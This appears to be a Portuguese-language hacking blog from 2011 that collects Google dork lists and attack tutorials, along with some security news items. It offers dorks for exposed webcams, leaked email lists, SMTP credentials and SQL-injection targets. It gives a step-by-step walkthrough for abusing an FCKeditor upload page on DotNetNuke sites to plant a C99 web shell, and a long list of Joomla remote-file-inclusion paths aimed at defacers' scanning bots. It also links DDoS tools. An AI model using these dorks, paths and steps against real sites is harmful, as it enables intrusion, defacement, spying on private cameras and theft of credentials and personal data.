Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador haking. Mostrar todas as postagens
Mostrando postagens com marcador haking. Mostrar todas as postagens

terça-feira, 25 de janeiro de 2011

Busca de webcans online

webcan hacking
Fiz essa string para aqueles que gostam de fuçar a vida do próximo  com esse código de busca temos acesso á Aproximadamente 79.900 resultados  (0,31 segundos), em nossa busca exclusão de site que contenham o termo hack,hacker,crack, assim nossa busca fica mais limpa e objetiva.
Quantidade:1 string
Autor:Cleiton Pinheiro
Fonte:blog.inurl.com.br
Código:
+inurl:/control/userimage.html -blog -hack -hacker -crack

String para buscar proxy uma lista

proxy


Proxy é um servidor que atende a requisições repassando os dados do cliente à frente. Um usuário (cliente) conecta-se a um servidor proxy, requisitando algum serviço, como um arquivo, conexão, website, ou outro recurso disponível em outro servidor.
Um servidor proxy pode, opcionalmente, alterar a requisição do cliente ou a resposta do servidor e, algumas vezes, pode disponibilizar este recurso sem nem mesmo se conectar ao servidor especificado. Pode também atuar como um servidor que armazena dados em forma de cache em redes de computadores. São instalados em máquinas com ligações tipicamente superiores às dos clientes e com poder de armazenamento elevado.
Esses servidores têm uma série de usos, como filtrar conteúdo, providenciar anonimato, entre outros.
Um HTTP caching proxy, por exemplo, permite que o cliente requisite um documento na World Wide Web e o proxy procura pelo documento em seu cache. Se encontrado, o documento é retornado imediatamente. Caso contrário, o proxy busca o documento no servidor remoto, entrega-o ao cliente e salva uma cópia no seu cache. Isso permite uma diminuição na latência, já que o servidor proxy, e não o servidor original, é acessado, proporcionando ainda uma redução do uso de banda.



Com isso temos conhecimento da importância de um proxy
criei um dork google pra busca destas listas de proxy disponíveis em sites

String dork
Quantidade:1 string
Autor:Cleiton Pinheiro
Fonte:blog.inurl.com.br
Código:
+":8080" +":3128" +":80" filetype:txt

Lista de proxy

Dorks para scanner de RFI

Remote File Inclusion

Remote File Inclusion (RFI) é um tipo de vulnerabilidade mais freqüentemente encontrados em sites, que permite a um atacante para incluir um arquivo remoto normalmente através de um script no servidor web . The vulnerability occurs due to the use of user supplied input without proper validation. A vulnerabilidade ocorre devido ao uso do produto fornecido a entrada do usuário sem a devida validação. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to: Isso pode levar a algo tão mínimo como saída o conteúdo do arquivo, mas dependendo da gravidade, para listar alguns, pode levar a:
Strings de RFI - INJECTION
uma pequena lista dorks 
Quantidade:Aproximadamente 596strings
Autor:Desconhecido
Fonte:goo.gl/5IPJM

domingo, 23 de janeiro de 2011

Vulnerabilidade em base de email

Vulnerabilidade em base de email
Vulnerabilidade em base de email com os termos "Mailbase +br txt" temos acesso a base de mail de vários sites com email brasileiros e internacionais no formato txt
Quantidade:Aproximadamente 1 string
Autor:Cleiton Pinheiro
Fonte:blog.inurl.com

Código:
inurl:mailbase +br ext:txt

Lista de Dork para Scanner de vulnerabilidade Joomla

Lista de Dork para Scanner de vulnerabilidade Joomla
Joomla! (pronuncia-se djumla) é um Sistema de gestão de conteúdos (Content Management System - CMS) desenvolvido a partir do CMS Mambo. É desenvolvido em PHP e pode ser executado no servidor Web Apache ou IIS e base de dados MySQL.
É um projeto de código aberto (licença GNU/GPL) e a sua última versão estável é a 1.5.21 (em 08 de Outubro de 2010); a sua última versão legada é a 1.0.15. O Joomla! é uma ferramenta de CMS muito poderosa, tendo recebido o "Linux Awards".

Lista de Dork para Scanner de vulnerabilidade Joomla
Quantidade:Aproximadamente 61 strings
Autor:Desconhecido
Fonte:Desconhecido

Strings de SQL - INJECTION

Strings de SQL - INJECTION
Structured Query Language, ou Linguagem de Consulta Estruturada ou SQL, é uma linguagem de pesquisa declarativa para banco de dados relacional (base de dados relacional). Muitas das características originais do SQL foram inspiradas na álgebra relacional.
O SQL foi desenvolvido originalmente no início dos anos 70 nos laboratórios da IBM em San Jose, dentro do projeto System R, que tinha por objetivo demonstrar a viabilidade da implementação do modelo relacional proposto por E. F. Codd. O nome original da linguagem era SEQUEL, acrônimo para "Structured English Query Language" (Linguagem de Consulta Estruturada em Inglês) [1], vindo daí o facto de, até hoje, a sigla, em inglês, ser comumente pronunciada "síquel" ao invés de "és-kiú-él", letra a letra. No entanto, em português, a pronúncia mais corrente é a letra a letra: "ésse-quê-éle".
A linguagem SQL é um grande padrão de banco de dados. Isto decorre da sua simplicidade e facilidade de uso. Ela se diferencia de outras linguagens de consulta a banco de dados no sentido em que uma consulta SQL especifica a forma do resultado e não o caminho para chegar a ele. Ela é uma linguagem declarativa em oposição a outras linguagens procedurais. Isto reduz o ciclo de aprendizado daqueles que se iniciam na linguagem.
Strings de SQL - INJECTION
uma pequena lista dorks 
Quantidade:Aproximadamente 127 strings
Autor:Desconhecido
Fonte:Desconhecido 

Scanneando com strings google e Invadindo site

Scanneando com strings google e Invadindo site

Com esse tutorial simples é rápido vamos aprender como fazer upload em sites rapidamente e depois ter acesso

Etapa 01 -
Acesse o www.google.com.br

Etapa 02 -
A busca use o código de pesquisa sabiamente.
Procure pelo seguinte termo
Código:
inurl:/tabid/36/language/en-US/Default.aspx

Etapa 03 -
Com a busca efetuada Aproximadamente 582 resultados (0,25 segundos) escolha um site de sua preferencia,
e substitua o termo "/tabid/36/language/en-US/Default.aspx" por,
Código:
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Exemplo:
www.site.com.br/tabid/36/language/en-US/Default.aspx      -01

www.site.com.br/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx -02


Etapa 04 -Você vai ter um link page.So Gallary onde pode criar urls para dentro dos site
Etapa 05 -Não faça nada por enquanto, abordando fase final.
"A caixa e parecida com essa."
PART 01 Scanneando com strings google e Invadindo site


Etapa 06 -
Agora substitua a URL na barra de endereços com um simples script
"delete o endereço do site e cole o código abaixo"
Código:
javascript:__doPostBack('ctlURL$cmdUpload','')

"Depois do script inserido na barra de endereços a caixa fica assim"
PART 02 Scanneando com strings google e Invadindo site



Etapa 07 -
Você vai encontrar a opção de Upload

Etapa 08 -
Selecione Raiz
  
Etapa 09 -
Envie seu pacote de Seu Shell C99, C100 etc..


OBS: todos esse processos foram feitos para que entenda como funciona
podemos ir deireto á fonte também.
Código:
intext:/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 

ou

Código:
*Fck/fcklinkgallery.aspx 

 ou

Código:
intitle:"Link Gallery" +fcklinkgallery ext:aspx

sábado, 22 de janeiro de 2011

Procurando por vulnerabilidade no sistema de forums Vbulletin

Este resumo não está disponível. Clique aqui para ver a postagem.

Strings para scanner # SQL Injection Dork List #

Strings para scanner Dorck: RFI PHP SQL - Injection

# SQL Injection Dork List #
SQL Injection ou injeção de SQL é uma técnica de invasão de sistemas que se tornou famosa na Internet, mas pode ser utilizada em qualquer linguagem de programação. No entanto, na Internet temos uma combinação explosiva:
  • A aplicação está acessível para toda internet que possui milhares de usuários dispostos a quebrar seu sistema;
  • O uso de linguagens de script fracamente tipadas em conjunto com com tipos de dados fracamente tipados ajuda a abrir algumas brexas de segurança.
  • O protocolo HTTP tem peculiaridades que quando mal utilizadas podem tornar uma aplicação web mais vulnerável como o uso de parâmetros GET.
    Mais conceito
===========================
site:.gov.br +sql +error inurl:"id="
index.php?option=com_mambads
inurl:index.php?option=com_expose
intitle:guestbook  "advanced guestbook 2.2 powered"
filetype:asp inurl:"shopdisplayproducts.asp
"Powered by: vBulletin * 3.0.1"  inurl:newreply.php
"Powered by Invision Power Board(U) v1.3 Final"
inurl:gotoURL.asp?url=
inurl:comersus_message.asp
ext:pl inurl:cgi intitle:"FormMail *"  -"*Referrer" -"* Denied" -sourceforge -error -cvs -input
inurl:"dispatch.php?atknodetype" |  inurl:class.at
"Powered by Gallery v1.4.4"
inurl:/cgi-bin/index.cgi inurl:topics inurl:viewca
inurl:"/becommunity/community/index.php?pageurl="
"Powered *: newtelligence" ("dasBlog 1.6"| "dasBlog 1.5"| "dasBlog 1.4"|"dasBlog 1.3")
filetype:cgi inurl:tseekdir.cgi
filetype:php inurl:index.php inurl:"module=subjects" inurl:"func=*" (listpages| viewpage | listcat)
intitle:"WordPress > * > Login form" inurl:"wp-login.php"
intitle: Index of finance.xls
intitle:index.of passwd passwd.bak
allinurl:loc_id "mod.php?mod=calendar"
allinurl:"mod php mod publisher"artid
allinurl:"mod.php?mod=gallery" id

Programa scanner dork php - sql injection rfi

scanner dork rfi - sql - php

DorkTools Versão 5.0 é um programa simples para procurar vulneráveis na Internet usando google consulta.
Feito em VB 6.0, já vem com uma biblioteca de strings com fonte em txt, que pode ser alterada de acordo com as necessidades do usuário.
[=] Resultado mais fresco
[=] Não precisa MSINET.OCX
[=] Não precisa Mscomctl.ocx
[=] Não precisa DLL

Baixar: goo.gl/uAHBl

Uma lista Strins de pesquisa para busca de vulnerabilidades á php injection

Uma lista Strings de pesquisa para busca de vulnerabilidades á php injection

As strings abaixo são direcionadas para scanners RFI - defaces que gostam de um bom scan em ssh rodar aquele velho bot-scanner testar se é safe off! ou safe on! vai gostar das strings á seguir acompanhadas de seus respectivos dorks dando um auxilio para bot encontrar seu site vul.
Google dork:
inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=
---------------------------------------------------------------
 
Google dork:
inurl:\"com_hashcash\"

CODE:
/components/com_hashcash/server.php?mosConfig_absolute_path=

------------------------------------------------------------------------------
 
Google dork:
inurl:\"com_htmlarea3_xtd-c\"
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
------------------------------------------------------------------------------------
 
Google dork:
inurl:\"com_sitemap\"
CODE:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
--------------------------------------------------------------------
 
Google dork:
inurl:\"com_forum\"
CODE:
/components/com_forum/download.php?phpbb_root_path=
--------------------------------------------------------------------
 
Google dork:
inurl:\"com_pccookbook\"
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
-----------------------------------------------------------------------------------
 
Google dork:
inurl:index.php?option=com_extcalendar
CODE:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=

-----------------------------------------------------------------------
 
Google dork:
inurl:\"minibb\"
CODE:
components/minibb/index.php?absolute_path=
---------------------------------------------------------------------
 
Google dork:
inurl:\"com_smf\"
CODE:
/components/com_smf/smf.php?mosConfig_absolute_path=

-----------------------------------------------------------------------
CODE:
/modules/mod_calendar.php?absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_pollxt\"
CODE:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_loudmounth\"
CODE:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
------------------------------------------------------------------------
 
Google dork:
inurl:\"com_videodb\"
CODE:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:index.php?option=com_pcchess
CODE:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_multibanners\"
CODE:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=ht Linkleri görebilmek için ÜYE olmalısınız
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_a6mambohelpdesk\"
Google dork:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_colophon\"
CODE:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_mgm\"
CODE:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_mambatstaff\"
CODE:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_securityimages\"
CODE:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
CODE:
/components/com_securityimages/lang.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_artlinks\"
CODE:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_galleria\"
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=

----------------------------------------------------------------------- 
Google dork:
inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=
----------------------------------------------------------------------- 
Google dork:
inurl:\"com_hashcash\"

CODE:
/components/com_hashcash/server.php?mosConfig_absolute_path=

----------------------------------------------------------------------- 
Google dork:
inurl:\"com_htmlarea3_xtd-c\"
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
----------------------------------------------------------------------- 
Google dork:
inurl:\"com_sitemap\"
CODE:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=

----------------------------------------------------------------------- 
Google dork:
inurl:\"com_forum\"
CODE:
/components/com_forum/download.php?phpbb_root_path=
--------------------------------------------------------------------
 
Google dork:
inurl:\"com_pccookbook\"
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_galleria\"
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_hashcash\"

CODE:
/components/com_hashcash/server.php?mosConfig_absolute_path=

-------------------------------------------------------------------- 
Google dork:

inurl:\"com_htmlarea3_xtd-c\"
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_sitemap\"
CODE:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_forum\"
CODE:
/components/com_forum/download.php?phpbb_root_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_pccookbook\"
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_colophon\"
CODE:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_mgm\"
CODE:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_mambatstaff\"
CODE:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_securityimages\"
CODE:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
CODE:
/components/com_securityimages/lang.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_artlinks\"
CODE:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_galleria\"
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=

Fonte:
goo.gl/cVZve

sexta-feira, 21 de janeiro de 2011

Busca de SMTP LOGIN e SENHA

Busca de SMTP LOGIN e SENHA
Este é link do "Conheça nos" da empresa Assembla
http://www.assembla.com/about o texto abaixo segui dentro do link.
Assembla fornece ferramentas e serviços para acelerar o desenvolvimento de software, com três linhas de negócio: Ferramentas: Espaços em Assembla.com, neste site, utilizado por milhares de equipes.
Conhecimento: Nós executar projetos de nós mesmos e fazemos de consultoria de gestão para corrigir os ciclos de lançamento de produto parado, racionalizar a estratégia de produto, construir equipes de inicialização, implementar processos iterativos e ágeis, e obter produtos lançados.
Nós somos experientes empresários de software, apoiado por desenvolvimento de talentos de topo. Assembla diretores têm projetado, construído, e lançou mais de 30 software comercial e produtos de serviços de informação.
Andy Singleton , presidente
Andy já construiu mais de 20 produtos de software e serviços de informação
Sesha Pratap , Desenvolvimento de Negócios
Sesha começou na faculdade de centro atuou como CEO, enquanto crescia a um businessProfile US $ 20 milhões
Hallinan PhD Peter, Consultoria, no Vale do Silício.

Entre outros gloriosos nomes da informatica

Agora vamos fazer uma pequena busca de SMTP no deposito de projetos :)

O código abaixo copie e cole no campo de busca veremos que encontramos.

 site:assembla.com  +@ *smtp.*  ext:sql


Loading


quinta-feira, 20 de janeiro de 2011

Garoto de 12 anos descobre falha crítica no Firefox e ganha US$ 3 mil

Garoto de 12 anos descobre falha crítica no Firefox e ganha


Em poucos dias o pequeno geek achou o bug. E promete continuar as buscas.


Alex Miller, um garoto estadunidense de 12 anos, recebeu um cheque de US$ 3 mil por ter descoberto um bug crítico no navegador Firefox, da Mozilla. Como parte de um projeto de “caça aos defeitos”, a quantia é paga pela empresa às pessoas que encontram – e comunicam à companhia – falhas críticas em seu software.
Não é nada comum um garoto, prestes a entrar na adolescência, ganhar US$ 3 mil por menos de duas semanas de trabalho. Mas Miller também não é um garoto comum. E não estamos falando de levantar uns trocados lavando o carro daquele tio pão duro.
Há alguns meses a Mozilla lançou um desafio, pedindo para que desenvolvedores e profissionais de programação encontrassem falhas graves de segurança no Firefox.
Segundo o site CNET, Miller ficou sabendo do desafio quando a Mozilla ainda pagava US$ 500 pelas descobertas, e isso o motivou.
Após algum tempo ele começou sua pesquisa, sem saber que o valor oferecido a quem achasse as falhas já tinha subido.
Trabalhando de forma regrada, por noventa minutos, durante dez dias, o menino da cidade de San Jose, nos EUA, descobriu uma brecha de segurança nos códigos do navegador, ganhando a recompensa de aproximadamente R$ 5.250,00.
“A Mozilla depende de colaboradores como esses para nossa sobrevivência. Somos uma comunidade formada majoritariamente por voluntários. Portanto, nós encorajamos as pessoas a se envolverem nesta comunidade, mesmo que nem todos sejam um gênio de 12 anos de idade” – disse Brandon Sterne, Gerente do Programa de Segurança da companhia.
De acordo com o jornal Mercury News, Sterne ainda disse que o acréscimo no valor pago aos profissionais se deu para refletir as mudanças na economia e no mercado.

Alex mostra seu cheque de US$ 3 mil. (Crédito: Mercury News)
A mãe do garoto, Elisa Miller, diz que ele é autodidata. “Ele aprendeu lendo os livros técnicos do pai. Acho que ele tem um dom para tecnologia.” – disse ela.
O jovem tem outras paixões, como badminton, política, aulas de violão e mandarim. Além disso, ele se empolga ao descrever sua missão de construir um robô de ataque mortal, para participar da Olimpíada de Ciências do colégio onde estuda.
Se continuar trilhando estes passos, certamente Alex terá um futuro brilhante.

Fonte:goo.gl/TuJ0c

Nova arma dos Anônimos, JS LOIC permite atacar sites direto do navegador

Nova arma dos Anônimos, JS LOIC permite atacar sites direto do navegador
Versão JavaScript do LOIC roda inclusive do iPhone e Android sem precisar de nenhuma instalação.


A ferramenta usada pelos “Anônimos” nos ataques a favor do WikiLeaks agora tem uma versão que roda direto do navegador. O JS LOIC é baseado em JavaScript e por isto não precisa ser instalado, bastando acessar uma página da web para colaborar com os ataques.
Além da facilidade de usar, o JS LOIC traz a vantagem de rodar em qualquer navegador moderno, incluindo os navegadores do iPhone e Android. Segundo Sean-Paul Correll, da Panda Security, o JS LOIC não é tão eficiente quanto a versão original, instalada na máquina. Mas, por outro lado, abre a possibilidade de um número absurdamente maior de pessoas colaborar com os ataques. Para os ativistas digitais, o conceito é até romântico: usar pequenos aparelhos celulares para atacar grandes sites é o possivelmente a coisa mais próxima de uma intifada online.
O LOIC (Low Orbit Ion Cannon, http://j.mp/hlipcB) é a ferramenta escolhida pelo grupo anônimo para derrubar sites usando a técnica de DDoS, e pode ser instalada em qualquer computador com Windows. Também há versões da “arma” em Java (e, portanto, multiplataforma – http://j.mp/e1cvuJ) e específicas para Linux e Mac (http://j.mp/dMKk7D). A versão em JavaScript pode ser encontrada em http://j.mp/i4korB, e qualquer um pode baixar e colocar em sua página da web.

AnonOps diz que continuará derrubando sites

AnonOps diz que continuará derrubando sites

O perfil AnonOps do twitter, ligado ao grupo Anonymous, publicou mensagem negando o abandono da “Operation: Payback”, que derrubava sites como protesto contra o cerco virtual ao WikiLeaks. Na mensagem, o AnonOps diz que a nova “Operação: Leakspin”, que visa inundar canais de comunicação online com os vazamentos do WikiLeaks será feita em paralelo aos ataques de DDoS do “Payback” sem os subtituir.
Mas vídeos e imagens divulgados na rede contradizem esta versão, propondo substituição das ações. Isto ocorre pela natureza horizontal, anônima e caótica do “Anonymous”, que não tem lideranças ou hierarquia rígidas, e portanto, se dividem facilmente em “facções” que nem sempre se comunicam ou concordam. “Anonymous” é uma denominação geral para usuários que publicam em fóruns online sem se identificar, nem mesmo com apelidos. A origem do nome remonta ao fórum 4chan, onde posts cujos autores não se identificam são marcados com a expressão “Anonymous”.
O ativismo online, também chamado de hacktivismo, tem como marco a “Operation: Payback” (Operação: Troco), que se realizou ataques de DDoS contra sites das associações de gravadoras e estúdios. A iniciativa era uma resposta a ataques semelhantes promovidos pelas entidades contra sites de torrent como o “The Pirate Bay”. O revide foi promovido nos fóruns online em salas de bate-papo do tipo IRC, onde os moderadores são comumente chamados de “Op” – daí o nome “AnonOps”.
Mais recentemente, o “Operation: Payback” voltou sua artilharia contra entidades que promoveram o cerco ao Assange, mas um “contra-ataque” tirou do ar o servidor de bate-papo onde os ativistas se reuniam. Durante esta dispersão, participantes do grupo se reorganizaram e publicou vídeos e imagens anunciando a “Operation: Leakspin”, que propõe inundar canais de conteúdo com vazamentos “disfarçados” de outro material.
A Geek visitou as salas de bate-papo do grupo, e viu discussões dedicadas tanto à desordem proposta pelo Leakspin quanto à derrubada de sites típicas do Payback. Ainda que longe de vazias, as salas tinham menos participantes que na semana passada, provavelmente em decorrência dos ataques que mantiveram os servidores constantemente fora do ar nos últimos dias.



Fonte:goo.gl/cgzJb

Hacker divulga ferramenta que desvenda vulnerabilidades em navegadores; Microsoft protesta

Hacker divulga ferramenta que desvenda vulnerabilidades em navegadores; Microsoft protesta


Engenheiro do Google Michal Zalewski alega ter avisado a Microsoft em julho, empresa de Redmond diz que problemas só foram descobertos em dezembro.

Aylons Hazzud

Uma pequena ferramenta chamada cross_fuzz está causando rebuliço no mundo dos navegadores, com protestos da Microsoft contra a publicação da ferramenta. O pequeno software foi criado especificamente para descobrir falhas em navegadores e tem se revelado muito competente nesta função: Internet Explorer, Firefox, Opera e navegadores baseados no WebKit (Google Chrome e Safari) já tiveram algumas falhas expostas pelo programinha.
A ferramenta foi criada em meados do ano passado pelo hacker Michal “lcamtuf” Zalewski, atualmente funcionário do Google. As falhas descobertas foram repassadas aos responsáveis por cada navegador a fim de que as falhas pudessem ser corrigidas, assim como o próprio cross_fuzz. E aí surge a confusão: enquanto as equipes da Mozilla, Opera e WebKit (o que inclui o Google) já tomaram providências para corrigir as falhas, a Microsoft não consertou o Internet Explorer, preferindo pedir a Zalewski que não divulgasse o programa. Zalewski recusou, e agora a Microsoft o acusa de facilitar a vida dos bandidos online.
Zalewski publicou um relato (http://bit.ly/gkQjjC) de seus contatos com a Microsoft e explica que decidiu publicar o software no tempo previsto por acreditar que as falhas já são conhecida por invasores chineses (http://bit.ly/icZReX). O relações-pública da Microsoft Jerry Bryant alega que até o dia 21/12/10 a empresa de Redmond não havia identificado nem sido informada por Zalewski de nenhuma falha, e por isto ainda a correção ainda não foi liberada.
A falha não é das mais críticas, pois nos Windows Vista e 7 o IE roda em modo protegido, limitando o impacto da vulnerabilidade, e também porque ainda não foi encontrada nenhum vírus ou ataque que faça uso desta brecha de segurança. O efeito mais imediato é portanto o aumento da animosidade entre o Google, onde Zalewski trabalha como engenheiro de segurança de sistemas, e a Microsoft, que em julho havia se queixado da divulgação de outra falha do Windows pelo Google.

Fonte:http://aylons.geek.com.br/posts/14487-hacker-divulga-ferramenta-que-desvenda-vulnerabilidades-em-navegadores-microsoft-protesta

Brasil rei do spam ?

Brasil rei do spam

Nos últimos anos, diversos relatórios têm apontado um crescimento surpreendente na quantidade de spams supostamente originados em redes brasileiras. Muita polêmica tem sido gerada sobre o tema, e esta atividade discutirá os problemas apontados por estas pesquisas e as medidas mais efetivas para os superarmos.
Grande parte desse spam e proveniente de redes Hacking – Banker em busca de vitimas pra paginas fraudulentas, ou executáveis de capturar de senhas.
Servidores Linux são muito cobiçados pelos Spammes pelas suas funções de envio e execução de scripts perls, que podem ser usados para Scanner de sites vull, chamados bot-scan.

Famoso Banco de dados do Google Hacking (GHDB)! ou "googledorks"

Google Hacking GHDB

Aqui é disponibilizado um grande conteúdo de caráter Hacking google
O famoso banco de dados GoogleDorcks não fica de fora, logo abaixo seguem uma seria de links onde as strings de pesquisa são expostas.

Banco de dados do Google Hacking (GHDB)!
Nós os chamamos de 'googledorks': inepto ou pessoas tolas como revelado pelo Google. Tudo o que você chamar esses tolos, você encontrou o centro do Universo Google Hacking! Pare por nossos para ver onde a magia acontece!

Avisos e Vulnerabilidades (215 cadastros)
Estas buscas localizar servidores vulneráveis. Estas pesquisas são, muitas vezes gerada a partir de vários postos de segurança consultivo e, em muitos casos, são produto ou específico da versão.

Error Messages (68 entries)
Realmente retardado mensagens de erro que diz way too much! 

Arquivos contendo informações suculento (230 cadastros)
Não usernames ou senhas, mas nenhum material interessante a menos. 

Os arquivos contendo senhas (135 cadastros)
SENHAS, para o AMOR DE DEUS! O Google descobriu que senhas! 

Arquivos contendo nomes de usuário (15 entradas)
Estes arquivos contém os nomes de usuários, senhas, mas não ... Ainda assim, o Google encontrar nomes em um site ..

Pontos de apoio (21 cadastros)
Exemplos de consultas que podem ajudar um hacker ganhar uma posição segura em um servidor web 

Páginas contendo portais de login (232 cadastros)
Estas são páginas de login para diversos serviços. Considerá-los pela porta da frente das funções mais sensíveis de um site. 

Páginas de rede que contém dados ou vulnerabilidade (59 cadastros)
Estas páginas contêm coisas como logs de firewall, honeypot logs, informações de rede, logs IDS ... todos os tipos de coisas divertidas! 

Diretórios sensíveis (61 cadastros)
coleta do Google de web sites compartilhando diretórios sensíveis. Os arquivos contidos aqui vai variar de sesitive a super-secreta! 

Compras on-line sensível Info (9 cadastros)
Exemplos de consultas que podem revelar informações de compras online, como dados de clientes, fornecedores, pedidos, números de cartão de crédito, informações de cartão de crédito, etc 

Vários Online Devices (201 cadastros)
Esta categoria contém coisas como impressoras, câmeras de vídeo, e toda sorte de coisas legais que encontrei na web com o Google. 

Vulnerável Arquivos (57 cadastros)
Centenas de arquivos vulneráveis que o Google pode encontrar em sites ... 

Servidores Vulneráveis (48 cadastros)
Essas pesquisas revelam servidores com vulnerabilidades específicas. Estes são encontrados em uma maneira diferente do que as pesquisas encontradas na seção "Arquivos de Vulnerável" seção. 

Web Server Detecção (72 cadastros)
Essas ligações demonstram a capacidade incrível do Google para seu perfil servidores web ..